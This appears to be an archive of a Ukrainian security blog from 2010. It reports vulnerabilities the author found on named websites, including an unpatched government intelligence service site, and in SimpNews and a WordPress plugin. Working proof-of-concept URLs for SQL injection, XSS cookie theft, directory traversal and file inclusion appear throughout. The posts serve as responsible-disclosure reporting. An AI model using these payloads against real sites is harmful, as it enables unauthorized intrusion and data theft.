Архів для категорії 'Уразливості'

Уразливості на adamant.ua

15:17 12.07.2010

05.12.2009

У квітні, 17.04.2009, я знайшов SQL Injection, Full path disclosure та Cross-Site Scripting уразливості на сайті http://adamant.ua (зокрема http://advert.adamant.ua). Про що найближчим часом сповіщу адміністрацію сайта.

Стосовно проектів компанії Адамант раніше я писав про уразливість на holms.adamant.ua.

Детальна інформація про уразливості з’явиться пізніше.

12.07.2010

SQL Injection:

http://advert.adamant.ua/www/delivery/ac.php?bannerid=-1%20or%20version()%3E4

Full path disclosure:

http://advert.adamant.ua/www/delivery/fc.php?MAX_type=1

XSS:

http://advert.adamant.ua/www/delivery/fc.php?MAX_type=%3CBODY%20onload=alert(document.cookie)%3E

Дані уразливості вже виправлені (за рахунок оновлення движка).

Добірка уразливостей

15:20 10.07.2010

В даній добірці уразливості в веб додатках:

  • Artofdefence Hyperguard Web Application Firewall: Remote Denial of Service (деталі)
  • CSRF in e107 (деталі)
  • Vbulletin - Two-Step External Link XSS (деталі)
  • Genera CMS Macro Web Media XSS Vulnerability (деталі)
  • IBM Tivoli Storage Manager Remote Agent Service Buffer Overflows (деталі)
  • Openregistrecil 1.02 (RFI/LFI) Multiple File Include Vulnerability (деталі)
  • phpBB2 Portal Mod XSS Vulnerability (деталі)
  • DBSite w/b CMS Multiple XSS Vulnerability (деталі)
  • Southern-Suzuki (Auth Bypass) Remote SQL Injection (деталі)
  • Пошкодження пам’яті в Apple iPhone (деталі)

Уразливості в SimpNews

15:04 09.07.2010

29.05.2010

У жовтні, 26.10.2009, я знайшов Full path disclosure та Cross-Site Scripting уразливості в SimpNews. Дані уразливості я виявив на www.boesch-it.de - офіційному сайті веб додатку. Про що найближчим часом повідомлю розробникам. Які також є розробниками SimpGB.

Детальна інформація про уразливості з’явиться пізніше. Спочатку повідомлю розробникам веб додатку.

09.07.2010

Full path disclosure:

http://site/simpnews/news.php?lang=1&layout=layout2&sortorder=0&category=1

XSS:

http://site/simpnews/news.php?layout=%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/simpnews/news.php?lang=en&layout=layout2&sortorder=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

Уразливі SimpNews V2.47.03 та попередні версії. В версії SimpNews V2.48.01 дані уразливості були виправлені.

Витік інформації про версію системи №5

22:41 08.07.2010

Продовжу тему витоку інформації про версію системи. Як я зазначав, виведення версії системи - це поширена функція у веб додатках та веб системах. Багато різних движків виводять інформацію про версію системи і дана можливість движків є уразливістю. Це витік інформації (Information Leakage) про версію системи, що може бути використаний для атаки на сайти, що використовують даний движок.

Наведу нові приклади Information Leakage уразливостей в різних веб додатках (зокрема форумах), що приводять до витоку інформації про версію системи.

IPB

В IPB на кожній сторінці форуму виводиться версія системи (Powered by Invision Power Board v1.3).

phpBB

В phpBB версію системи можна дізнатися в файлах http://site/docs/CHANGELOG.html, http://site/docs/INSTALL.html та http://site/docs/README.html (phpBB 2.0.13).

vBulletin

В vBulletin на кожній сторінці форуму виводиться версія системи (Powered by vBulletin Version 3.8.2).

SMF

В SMF на кожній сторінці форуму виводиться версія системи (Powered by SMF 1.1.11).

YaBB

В YaBB на кожній сторінці форуму виводиться версія системи (Powered by YaBB 2.4).

Добірка уразливостей

15:21 08.07.2010

В даній добірці уразливості в веб додатках:

  • phion airlock Web Application Firewall: Remote Denial of Service via Management Interface (unauthenticated) and Command Execution (деталі)
  • Ziggurat CMS Multiple Vulnerabilities (деталі)
  • 60cycleCMS (DOCUMENT_ROOT) Multiple Local File Inclusion Vulnerability (деталі)
  • Openscrutin 1.03 (RFI/LFI) Multiple File Include Vulnerability (деталі)
  • Apache OFBiz Multiple XSS Vulnerabilities (деталі)
  • Unisys Business Information Server Stack Buffer Overflow (деталі)
  • User Invoices Persistent XSS Vulnerability in CactuShop (деталі)
  • e107 Content Management Plugin Script Insertion Vulnerability (деталі)
  • IP address spoofing in e107 (деталі)
  • Trustwave’s SpiderLabs Security Advisory TWSL2009-002 - Multiple vulnerabilities in Cisco ASA Web VPN (деталі)

Уразливості на www.szru.gov.ua

15:12 07.07.2010

30.11.2009

У квітні, 10.04.2009, я знайшов Cross-Site Scripting та SQL Injection уразливості на http://www.szru.gov.ua - сайті Служби Зовнішньої Розвідки України, що також доступний за адресою http://www.fisu.gov.ua. Це при тому, що з 2007 року вони так і не виправили ще одну SQL Injection уразливість. Про що найближчим часом сповіщу адміністрацію сайта.

Раніше я вже писав про уразливості на www.szru.gov.ua.

Детальна інформація про уразливості з’явиться пізніше.

07.07.2010

XSS:

Це ще один приклад XSS атак через помилки при запитах до БД.

SQL Injection:

http://www.szru.gov.ua/cms/ua%20where%201=1–%20/

Через дану уразливість зокрема можна проводити DoS атаки.

Дані уразливості досі не виправлені.

Добірка уразливостей

15:23 06.07.2010

В даній добірці уразливості в веб додатках:

  • Cisco Physical Access Gateway Denial of Service Vulnerability (деталі)
  • MyBB Password Reset Email BCC: Injection Vulnerability (деталі)
  • MyBB Password Reset Weak Random Numbers Vulnerability (деталі)
  • Skype URI Handler Input Validation (деталі)
  • Skype Protocol Handler datapath Argument Injection Remote Code Execution Vulnerability (деталі)
  • Skype URI Processing Arbitrary XML File Deletion Vulnerability (деталі)
  • e107 Avatar/Photograph Image File Upload Vulnerability (деталі)
  • RJ-iTop Network Vulnerability Scanner System Multiple SQL Injection Vulnerabilities (деталі)
  • Nucleus CMS v.3.51 (DIR_LIBS) Multiple Vulnerability (деталі)
  • WebAsyst Shop-Script Multiple Input Validation Vulnerabilities (деталі)

Уразливості на mmr.net.ua

15:12 03.07.2010

01.12.2009

У квітні, 13.04.2009, я знайшов Directory Traversal, Local File Inclusion, Full path disclosure та Cross-Site Scripting уразливості на проекті http://mmr.net.ua (онлайн ЗМІ). Про що найближчим часом сповіщу адміністрацію проекту.

Детальна інформація про уразливості з’явиться пізніше. Треба дати час адмінам на реакцію з цього приводу.

03.07.2010

Directory Traversal:

http://mmr.net.ua/advertisement/www/delivery/fc.php?MAX_type=../../../.htaccess%00

Local File Inclusion:

http://mmr.net.ua/advertisement/www/delivery/fc.php?MAX_type=../file.php

Full disclosure:

http://mmr.net.ua/advertisement/www/delivery/fc.php?MAX_type=1

XSS:

http://mmr.net.ua/advertisement/www/delivery/fc.php?MAX_type=%3CBODY%20onload=alert(document.cookie)%3E

Дані уразливості вже виправлені.

Добірка уразливостей

15:21 02.07.2010

В даній добірці уразливості в веб додатках:

  • Vulnerabilities in Cisco Video Surveillance Products (деталі)
  • Police Municipale Open Main Courante 1.01beta (RFI/LFI) Multiple File Include Vulnerability (деталі)
  • Openurgence vaccin 1.03 (RFI/LFI) Multiple File Include Vulnerability (деталі)
  • MKPortal Contact module XSS Vulnerability (деталі)
  • Vieassociative Openmairie 1.01 beta (RFI/LFI) Multiple File Include Vuln (деталі)
  • Openstock Facture 2.02 Local File Include Vulnerability (деталі)
  • Opentel Openmairie tel 1.02 Local File Include Vulnerability (деталі)
  • Vana CMS Remote File Download (деталі)
  • Sun Java Web Start Arbitrary Command Execution Vulnerability (деталі)
  • Sun Java Runtime AWT setDifflCM Stack Overflow Vulnerability (деталі)

Уразливості в WP-UserOnline для WordPress

15:22 01.07.2010

30.04.2010

У квітні, 26.04.2010, я знайшов Cross-Site Scripting та Full path disclosure уразливості в плагіні WP-UserOnline для WordPress. Дані уразливості я виявив на одному сайті, що використовує даний плагін. Про що найближчим часом сповіщу розробникам.

Детальна інформація про уразливості з’явиться пізніше. Спочатку повідомлю розробникам плагіна.

01.07.2010

XSS:

За допомогою спеціального запиту до сайта можна провести XSS атаку. Для цього потрібно спеціальним чином (не через браузер) відправити GET запит до сторінки http://site/?<script>alert(document.cookie)</script>.

Цe persistent XSS. Уразливість проявляється на сторінці http://site/wp-admin/index.php?page=wp-useronline.

Full path disclosure:

http://site/wp-content/plugins/wp-useronline/admin.php

http://site/wp-content/plugins/wp-useronline/widget.php

http://site/wp-content/plugins/wp-useronline/wp-stats.php

http://site/wp-content/plugins/wp-useronline/wp-useronline.php

http://site/wp-content/plugins/wp-useronline/scb/Widget.php

http://site/wp-content/plugins/wp-useronline/scb/load.php

Уразливі WP-UserOnline 2.62 та попередні версії. В версії WP-UserOnline 2.70 розробник виправив XSS, але не Full path disclosure уразливості.

24.12.2012

Експлоіт на Perl:

WP-UserOnline.txt

Експлоіт для даної уразливості, що я розробив 26.04.2010.